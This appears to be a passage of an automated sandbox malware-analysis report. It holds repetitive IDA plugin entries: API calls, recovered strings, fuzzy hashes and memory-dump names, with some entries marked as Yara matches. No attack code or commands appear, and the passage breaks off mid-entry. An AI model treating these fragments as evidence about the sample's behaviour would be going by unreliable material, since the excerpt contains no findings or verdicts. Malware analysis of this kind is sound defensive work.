                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: EnvironmentVariable
                                                                                                                        • String ID: ..\..\third_party\libc++\src\include\string_view:267: assertion __s != nullptr failed: null pointer passed to non-null argument of char_traits<...>::length
                                                                                                                        • API String ID: 1431749950-3833978849
                                                                                                                        • Opcode ID: 4d6027af46a6bc1d2655bb8d6b6a05b9bb0def642764fad81b88d00fd5c7ded4
                                                                                                                        • Instruction ID: 8ef2402148ced6f53e72c4707a135ed8d96ced39ff6f5fceadba877ad5fad105
                                                                                                                        • Opcode Fuzzy Hash: 4d6027af46a6bc1d2655bb8d6b6a05b9bb0def642764fad81b88d00fd5c7ded4
                                                                                                                        • Instruction Fuzzy Hash: 693106B1E0021D6FDB15AB78DC45BBF76B8EF54314F044029FE05E7243E764A94987A2
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: __aulldiv__aullrem
                                                                                                                        • String ID: -
                                                                                                                        • API String ID: 3839614884-2547889144
                                                                                                                        • Opcode ID: 1f5753eefbbbc281cc550a72c65480dc67463109e97faf0b03260f45106d53c6
                                                                                                                        • Instruction ID: 87fb410402890a7d411176fb6e27352e8339cb188f4f87ecdc4a005b9b6ebe8e
                                                                                                                        • Opcode Fuzzy Hash: 1f5753eefbbbc281cc550a72c65480dc67463109e97faf0b03260f45106d53c6
                                                                                                                        • Instruction Fuzzy Hash: 8831E6B2D102155BEB109F78DC817AEB7A9EFC5350F29422AF819D7381EB759E0183D1
                                                                                                                        APIs
                                                                                                                        • __EH_prolog3_catch.LIBCMT ref: 0595416B
                                                                                                                        • Concurrency::cancel_current_task.LIBCPMT ref: 05954281
                                                                                                                          • Part of subcall function 0594FD8B: __EH_prolog3_GS.LIBCMT ref: 0594FD92
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1724191152.0000000005940000.00000040.00001000.00020000.00000000.sdmp, Offset: 05940000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_5940000_0x001900000002ab40-59.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Concurrency::cancel_current_taskH_prolog3_H_prolog3_catch
                                                                                                                        • String ID: -6D
                                                                                                                        • API String ID: 2709520005-930682973
                                                                                                                        • Opcode ID: fb0654f856706a6d4328a81d7426676dc373d0dee46d1d266c59ff89e3fa75b4
                                                                                                                        • Instruction ID: 25eb86fe62484885101f422dc82aa2d0cf4ac0359ca1bd23c3365ee5163729a1
                                                                                                                        • Opcode Fuzzy Hash: fb0654f856706a6d4328a81d7426676dc373d0dee46d1d266c59ff89e3fa75b4
                                                                                                                        • Instruction Fuzzy Hash: 53316D71A012459FCB14DFA9C48499EBBF5FF99320F24861DD569A7380C730AA45CBA0
                                                                                                                        APIs
                                                                                                                        • __EH_prolog3_catch.LIBCMT ref: 059543BB
                                                                                                                        • Concurrency::cancel_current_task.LIBCPMT ref: 059544BB
                                                                                                                          • Part of subcall function 0594FD8B: __EH_prolog3_GS.LIBCMT ref: 0594FD92
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1724191152.0000000005940000.00000040.00001000.00020000.00000000.sdmp, Offset: 05940000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_5940000_0x001900000002ab40-59.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Concurrency::cancel_current_taskH_prolog3_H_prolog3_catch
                                                                                                                        • String ID: g6D
                                                                                                                        • API String ID: 2709520005-1249120331
                                                                                                                        • Opcode ID: 2f6c24e52b3ac435da7c00fb66e5a31a4cfaa7f440dcf47f79501e53bf2f75f5
                                                                                                                        • Instruction ID: 6fff4e2bb2256e284d6474935ae4e7f910c84d9ae9174e8974bdd5284affe524
                                                                                                                        • Opcode Fuzzy Hash: 2f6c24e52b3ac435da7c00fb66e5a31a4cfaa7f440dcf47f79501e53bf2f75f5
                                                                                                                        • Instruction Fuzzy Hash: 4B313271B012059FCF14DFA9D8849AEBBF5FF88324B20861DE569A73D0D734A941CB90
                                                                                                                        APIs
                                                                                                                        • __EH_prolog3_catch.LIBCMT ref: 0595429B
                                                                                                                        • Concurrency::cancel_current_task.LIBCPMT ref: 0595439B
                                                                                                                          • Part of subcall function 0594FD8B: __EH_prolog3_GS.LIBCMT ref: 0594FD92
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1724191152.0000000005940000.00000040.00001000.00020000.00000000.sdmp, Offset: 05940000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_5940000_0x001900000002ab40-59.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Concurrency::cancel_current_taskH_prolog3_H_prolog3_catch
                                                                                                                        • String ID: J6D
                                                                                                                        • API String ID: 2709520005-2061616632
                                                                                                                        • Opcode ID: 525a6d9788416b7cf4442389ea2eef7cb29468b51d6e045bb261aebde42d1bfd
                                                                                                                        • Instruction ID: 4d852b4d64243413c5bb2c41e283500d01ab37cd553ea4e3a107f7b4ff475960
                                                                                                                        • Opcode Fuzzy Hash: 525a6d9788416b7cf4442389ea2eef7cb29468b51d6e045bb261aebde42d1bfd
                                                                                                                        • Instruction Fuzzy Hash: 5D314F71A012059FCF14DFA9D9849AEBBF5FF88320B20862EE529A7290D730A941CB50
                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 0594E4F1
                                                                                                                          • Part of subcall function 0594F8C5: __EH_prolog3.LIBCMT ref: 0594F8CC
                                                                                                                          • Part of subcall function 0595157B: __EH_prolog3.LIBCMT ref: 05951582
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1724191152.0000000005940000.00000040.00001000.00020000.00000000.sdmp, Offset: 05940000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_5940000_0x001900000002ab40-59.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog3
                                                                                                                        • String ID: '$6&D
                                                                                                                        • API String ID: 431132790-135963631
                                                                                                                        • Opcode ID: e891734107a8b7106b3f412bd6cda0029be823f66ad55f354bcc28b33d933619
                                                                                                                        • Instruction ID: 1836d6e47fc638c60413c60807d70b0f8326a99c15b10eb359f9c2ad68bad277
                                                                                                                        • Opcode Fuzzy Hash: e891734107a8b7106b3f412bd6cda0029be823f66ad55f354bcc28b33d933619
                                                                                                                        • Instruction Fuzzy Hash: BE313C70E05249EFDF14EBA4C558EAEBF78AF84310F10405ED406AB280DB746E09CB95
                                                                                                                        APIs
                                                                                                                        • ___except_validate_context_record.LIBVCRUNTIME ref: 0091C86F
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ___except_validate_context_record
                                                                                                                        • String ID: csm$csm
                                                                                                                        • API String ID: 3493665558-3733052814
                                                                                                                        • Opcode ID: 5af3be038898235a752b8b5daef5a1c542b58dfb7028a610afe17194032a3e3e
                                                                                                                        • Instruction ID: 5435f3cacbd94e2551b267e3e5da71740ded5d7a968013e5442fd8bb50fa9450
                                                                                                                        • Opcode Fuzzy Hash: 5af3be038898235a752b8b5daef5a1c542b58dfb7028a610afe17194032a3e3e
                                                                                                                        • Instruction Fuzzy Hash: 4831E9B268021DEBCF228F54CD80AFA7B69FF48755B18459AFC5459251C332CCE1DB85
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1724191152.0000000005940000.00000040.00001000.00020000.00000000.sdmp, Offset: 05940000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_5940000_0x001900000002ab40-59.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog3_
                                                                                                                        • String ID: .D$H
                                                                                                                        • API String ID: 2427045233-2149836473
                                                                                                                        • Opcode ID: 4ea3f55d45f720e1be82944e3b4e6bc6ed971616cc677ebe63dfb653b9616ad8
                                                                                                                        • Instruction ID: 1c33aa152eed3d7c27cbcd80e6b52ef90bce0287c738fd94d1ae0fdf97f1fe2a
                                                                                                                        • Opcode Fuzzy Hash: 4ea3f55d45f720e1be82944e3b4e6bc6ed971616cc677ebe63dfb653b9616ad8
                                                                                                                        • Instruction Fuzzy Hash: CF31AC71E05248EEEB14DBA8C948BDDBBB4AF58310F1085ADD115B7281D7786E09CB25
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,?,00000000,?,?,?,008490FB,00000001,?,?,?,?,?,?), ref: 008BCAA2
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: HandleModule
                                                                                                                        • String ID: C$STATIC
                                                                                                                        • API String ID: 4139908857-943213032
                                                                                                                        • Opcode ID: 9571a940192283a5ca8a18aefcfacdf5720afdf396394f8a1ddef510e39c0b7a
                                                                                                                        • Instruction ID: 5096d084979fac02b0f021520fe1f54798cdb3ff5db8973b4733bd1c226e84b7
                                                                                                                        • Opcode Fuzzy Hash: 9571a940192283a5ca8a18aefcfacdf5720afdf396394f8a1ddef510e39c0b7a
                                                                                                                        • Instruction Fuzzy Hash: 3C31BC71A183049BD7049F69D8986BEBBE4FFC8314F05861EF88897251DBB09A809B91
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FilePointer
                                                                                                                        • String ID: SetFilePointerEx$file_io_win.cc
                                                                                                                        • API String ID: 973152223-1783654876
                                                                                                                        • Opcode ID: 920394649c297fe4aa5ea00f08f5ad6fd6b2b5798a7cbc1e534439be3fda65f0
                                                                                                                        • Instruction ID: 74941d89da847af9a77cc33858b409abbc0416aa1c1f7c0af9d79803ddb01823
                                                                                                                        • Opcode Fuzzy Hash: 920394649c297fe4aa5ea00f08f5ad6fd6b2b5798a7cbc1e534439be3fda65f0
                                                                                                                        • Instruction Fuzzy Hash: 8A218F716047549BC7209F289842B5BB7A9FBC5B14F018A29E849DB381DE70D905CBD2
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        • check-the-interface, xrefs: 008BAEBA, 008BAF09, 008BAF10, 008BAF1D
                                                                                                                        • ..\..\third_party\libc++\src\include\__string\char_traits.h:245: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap, xrefs: 008BAF74
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _strlen
                                                                                                                        • String ID: ..\..\third_party\libc++\src\include\__string\char_traits.h:245: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap$check-the-interface
                                                                                                                        • API String ID: 4218353326-72280420
                                                                                                                        • Opcode ID: e4a66f649e0ac4b23bce63da711a9d9696df0f1ec70f1fa825d27292e513de6d
                                                                                                                        • Instruction ID: 4508c4939c9fd95a8d0b43601527a618571b74054e25851db761ca4fdc4ca466
                                                                                                                        • Opcode Fuzzy Hash: e4a66f649e0ac4b23bce63da711a9d9696df0f1ec70f1fa825d27292e513de6d
                                                                                                                        • Instruction Fuzzy Hash: 912106B1E0425A5ECB14AFB4D891BFFB7A5EF80314F160439E401E7382EB645A0487D2
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        • do-not-launch-browser, xrefs: 00840EBC, 00840F0E, 00840F15, 00840F22
                                                                                                                        • ..\..\third_party\libc++\src\include\__string\char_traits.h:245: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap, xrefs: 00840F75
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _strlen
                                                                                                                        • String ID: ..\..\third_party\libc++\src\include\__string\char_traits.h:245: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap$do-not-launch-browser
                                                                                                                        • API String ID: 4218353326-2519540672
                                                                                                                        • Opcode ID: 656b683aeb7e0cc9292e3d07b7260222b5fd8bdce30d5d18d6bb1c454cd9291d
                                                                                                                        • Instruction ID: b2ebdc442c0c4aff599d0532796185a3a064321752b88e8b143e96c2ce753514
                                                                                                                        • Opcode Fuzzy Hash: 656b683aeb7e0cc9292e3d07b7260222b5fd8bdce30d5d18d6bb1c454cd9291d
                                                                                                                        • Instruction Fuzzy Hash: B621F472D0421D9FCB20ABE8D891BEFB7A4EB54714F150439E905EB282EB745D088BD2
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        • old_ver, xrefs: 008E2085, 008E20CD, 008E20D4, 008E20E1
                                                                                                                        • ..\..\third_party\libc++\src\include\__string\char_traits.h:245: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap, xrefs: 008E2128
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _strlen
                                                                                                                        • String ID: ..\..\third_party\libc++\src\include\__string\char_traits.h:245: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap$old_ver
                                                                                                                        • API String ID: 4218353326-2335872202
                                                                                                                        • Opcode ID: 0fc51e875b60e6f064ab7bb2586269d7df9df786a3f96e6e7df1b4813e34013d
                                                                                                                        • Instruction ID: cc67f12f856809cffd81f21bc8f3c17101054efec5256201e62fb31e8aabcc1c
                                                                                                                        • Opcode Fuzzy Hash: 0fc51e875b60e6f064ab7bb2586269d7df9df786a3f96e6e7df1b4813e34013d
                                                                                                                        • Instruction Fuzzy Hash: E9113AB2D0429D5FCB10AAE9DC92EBFB6ACEF41314F150439E910E7182EA215A45C7D2
                                                                                                                        APIs
                                                                                                                        • __EH_prolog3_GS.LIBCMT ref: 05956138
                                                                                                                          • Part of subcall function 0594CD2C: __EH_prolog3.LIBCMT ref: 0594CD33
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1724191152.0000000005940000.00000040.00001000.00020000.00000000.sdmp, Offset: 05940000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_5940000_0x001900000002ab40-59.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog3H_prolog3_
                                                                                                                        • String ID: H8D$d
                                                                                                                        • API String ID: 3355343447-1469732128
                                                                                                                        • Opcode ID: ed6f760672945644dbb071bb63a6a800d80f77f235118752496369c542947f77
                                                                                                                        • Instruction ID: feabdeb3b0c4f349e5cf4aa827ca9f2c8310e276bfc8ca04944da5ac19551566
                                                                                                                        • Opcode Fuzzy Hash: ed6f760672945644dbb071bb63a6a800d80f77f235118752496369c542947f77
                                                                                                                        • Instruction Fuzzy Hash: 03215E71A012189FDB24FB64CD49BDD7AB8AF89300F5040E9E509A7241DB746F58CF91
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        • ..\..\third_party\libc++\src\include\__string\char_traits.h:245: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap, xrefs: 00834EC3
                                                                                                                        • ..\..\third_party\libc++\src\include\string:953: assertion __s != nullptr failed: basic_string(const char*) detected nullptr, xrefs: 00834ECA
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _strlen
                                                                                                                        • String ID: ..\..\third_party\libc++\src\include\__string\char_traits.h:245: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap$..\..\third_party\libc++\src\include\string:953: assertion __s != nullptr failed: basic_string(const char*) detected nullptr
                                                                                                                        • API String ID: 4218353326-2004309996
                                                                                                                        • Opcode ID: 0a248b1bfa77444f9b1529b10092264bc8173468dc0916fb7412f66cae2cdc0b
                                                                                                                        • Instruction ID: 9151a4b2789a9893882d3a745317ba4306ee299276e2a5a4d7c60e48cb8eb2ef
                                                                                                                        • Opcode Fuzzy Hash: 0a248b1bfa77444f9b1529b10092264bc8173468dc0916fb7412f66cae2cdc0b
                                                                                                                        • Instruction Fuzzy Hash: 640128B2B002456AD7202EA5DC81E2B77CCFFD1768F15583AF405C7281EAB1AC4083E2
                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 0594CEA6
                                                                                                                          • Part of subcall function 0594C9C3: __EH_prolog3_GS.LIBCMT ref: 0594C9CA
                                                                                                                          • Part of subcall function 0594DE14: __EH_prolog3.LIBCMT ref: 0594DE1B
                                                                                                                          • Part of subcall function 0594FA18: __EH_prolog3.LIBCMT ref: 0594FA1F
                                                                                                                          • Part of subcall function 0594FA18: _Func_class.LIBCONCRT ref: 0594FA71
                                                                                                                          • Part of subcall function 0594FA18: _Func_class.LIBCONCRT ref: 0594FAC3
                                                                                                                          • Part of subcall function 0594FA18: _Func_class.LIBCONCRT ref: 0594FAD6
                                                                                                                          • Part of subcall function 0594DAFC: __EH_prolog3_GS.LIBCMT ref: 0594DB06
                                                                                                                          • Part of subcall function 0594DA0B: _Func_class.LIBCONCRT ref: 0594DA4E
                                                                                                                        • _Func_class.LIBCONCRT ref: 0594CF4B
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1724191152.0000000005940000.00000040.00001000.00020000.00000000.sdmp, Offset: 05940000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_5940000_0x001900000002ab40-59.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Func_class$H_prolog3$H_prolog3_
                                                                                                                        • String ID: ! D
                                                                                                                        • API String ID: 3328072954-586896622
                                                                                                                        • Opcode ID: 21598411db54109530d3edb8b3260081bdccbd1328aa32118fff40e5906d5dd3
                                                                                                                        • Instruction ID: 2c059cabd77472aeabd64157f07edcafc5aa5d2c0b0b82e40f67d98769dfb371
                                                                                                                        • Opcode Fuzzy Hash: 21598411db54109530d3edb8b3260081bdccbd1328aa32118fff40e5906d5dd3
                                                                                                                        • Instruction Fuzzy Hash: 77218B70D06289AEDF05DFA8C908ADDBFB09F95304F148088D44477351C7746F45CBA1
                                                                                                                        APIs
                                                                                                                        • MoveFileExW.KERNEL32(?,00000000,00000004,?,00000000), ref: 0089E0C3
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FileMove
                                                                                                                        • String ID: DeleteFileAfterReboot$file_util_win.cc
                                                                                                                        • API String ID: 3562171763-2741251342
                                                                                                                        • Opcode ID: b352ebe8a52dbe7d922c4e8565eff9e28afe063549b20609805b3c440d521fbe
                                                                                                                        • Instruction ID: 6931239b0e27a76033cd6b98c7657ecb6ae3f5091f3fb97e447587a667b45a34
